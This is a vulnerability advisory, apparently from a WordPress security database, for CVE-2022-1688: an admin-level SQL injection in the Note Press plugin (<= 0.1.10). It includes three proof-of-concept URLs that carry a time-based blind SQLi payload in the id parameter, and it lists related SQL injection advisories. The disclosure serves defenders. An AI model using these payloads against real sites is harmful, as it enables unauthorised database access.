Note Press <= 0.1.10 – Admin+ SQLi via id | CVE 2022-1688 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the id parameter before using it in various SQL statement via the admin dashboard, leading to SQL Injections

Proof of Concept

https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=view&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=edit&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)
https://example.com/wp-admin/admin.php?page=Note_Press-Main-Menu&action=delete&id=17+AND+(SELECT+3630+FROM+(SELECT(SLEEP(5)))KdTt)

Affects Plugins

No known fix

References

CVE

URL

https://bulletin.iese.de/post/note-press_0-1-10_1

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)

Submitter

Daniel Krohmer

Submitter website

https://iese.fraunhofer.de/en.html

Verified

Yes

WPVDB ID

63d4444b-9b04-47f5-a692-c6c6c8ea7d92

Timeline

Publicly Published

2022-05-09 (about 3 years ago)

Added

2022-05-12 (about 3 years ago)

Last Updated

2022-05-14 (about 3 years ago)

Other

Published

Title

Published

2025-02-20

Title

Ultimate Member < 2.10.0 - Authenticated SQL Injection

Published

2021-06-29

Title

Popup box < 2.3.4 - Authenticated Blind SQL Injections

Published

2025-01-24

Title

RSVP and Event Management Plugin < 2.7.15 - Authenticated (Administrator+) SQL Injection

Published

2021-10-11

Title

WCFM - Frontend Manager for WooCommerce < 6.5.12 - Customer/Subscriber+ SQL Injection

Published

2024-10-18

Title

Photo Gallery Slideshow & Masonry Tiled Gallery < 1.0.4 - Authenticated (Admin+) SQL Injection